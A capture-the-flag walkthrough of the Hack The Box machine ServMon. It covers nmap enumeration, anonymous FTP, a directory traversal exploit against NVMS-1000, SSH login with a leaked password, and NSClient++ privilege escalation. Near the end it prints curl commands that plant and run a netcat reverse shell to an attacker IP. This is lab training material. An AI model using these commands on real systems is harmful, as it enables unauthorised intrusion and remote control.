ServMon HacktheBox Walkthrough

In this article we are going to solve another boot2root challenge Servmon from hackthebox .


walkthrough


IP of the target 10.10.10.184

we started with nmap to find open ports and services running in the system by using the command


nmap -sC -sV -o nmap.txt 10.10.10.184
21/tcp   open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20  12:05PM       <DIR>          Users
| ftp-syst: 
|_  SYST: Windows_NT
22/tcp   open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
|   256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_  256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
80/tcp   open  http
| fingerprint-strings: 
|   GetRequest, HTTPOptions, RTSPRequest: 
|     HTTP/1.1 200 OK
|     Content-type: text/html
|     Content-Length: 340
|     Connection: close
|     AuthInfo: 
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|     <html xmlns="http://www.w3.org/1999/xhtml">
|     <head>
|     <title></title>
|     <script type="text/javascript">
|     window.location.href = "Pages/login.htm";
|     </script>
|     </head>
|     <body>
|     </body>
|     </html>
|   NULL: 
|     HTTP/1.1 408 Request Timeout
|     Content-type: text/html
|     Content-Length: 0
|     Connection: close
|_    AuthInfo:
|_http-title: Site doesn't have a title (text/html).
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
5666/tcp open  tcpwrapped
6699/tcp open  napster?
8443/tcp open  ssl/https-alt
| fingerprint-strings: 
|   FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions: 
|     HTTP/1.1 404
|     Content-Length: 18
|     Document not found
|   GetRequest: 
|     HTTP/1.1 302
|     Content-Length: 0
|     Location: /index.html
|     workers
|_    jobs
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after:  2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time

as we can see that so many ports are open , so first of all we decided to login anonymously into FTP using credentials anonymous anonymous

now here we found two Users "Nadine" and "Nathan" , and after enumerating more we found two important text files , we downloaded them in our local system , now lets try to read them.

Information extracted :-

[+] user names : Nathan and Nadine

[+] passwords.txt file stored in Desktop directory

[+] NVMS web application is present


now our next step is to enumerate port 80 .

we have a NVMS-1000 login panel and some common username and password didn't worked , so we started to search for nvms-1000 exploit and found one using the command

search nvms

with the Description as "Directory Traversal" we got one thing clear that we have password.txt and usernames and a Desktop directory so there are chances that we can extract the passwords.txt file using this exploit , okay lets try

okay we have got something , lets try to read the file using cat command

umm looks interesting we have got a list of passwords and we have two users also as "Nadine" and "Nathan" , and SSH Port is also open , so we can try these passwords against two users to check if we are on right path or not.

okay we have found the password for user nadine as "********" , now I tried this password to connect to the system as user nadine using ssh

ssh nadine@10.10.10.184

we are in now as user nadine and can read the user flag and it's time for privilege

escalation :)

we started searching in different directories and found something useful

lets try to read the file using type command ;)

it means only 127.0.0.1 is allowed to use nsclient++ and not any other IP , so after this we have two methods to get admin access , one is using the Port forwarding and then following the NSClient++ exploit and another one is to use the nsclient++ api(easy way) and of-course we preferred the easy way :)

first of all we will transfer nc.exe to /tmp directory .

curl -s -k -u admin -X PUT https://127.0.0.1:8443/api/v1/scripts/ext/scripts/new.bat --data-binary "c:\temp\nc.exe 10.10.14.22 1234 -e cmd.exe"
curl -s -k -u admin https://127.0.0.1:8443/api/v1/queries/new/commands/execute?time=1m

after executing these commands we get the reverse shell as admin

we can read the final flag now and this completed our challenge , Hope you like the walkthrough :)

Recent Posts

See All

Website change notice

As you all know that our website is providing walkthrough of different challenges from different platforms and without any advertisement but due to some funds issue we can't continue this website :( S

Subscribe to HacLabs newsletter

Get priority notification on the release of the latest articles.

  • YouTube
  • Twitter
  • Instagram
  • Linkedin

© 2020 by HacLabs.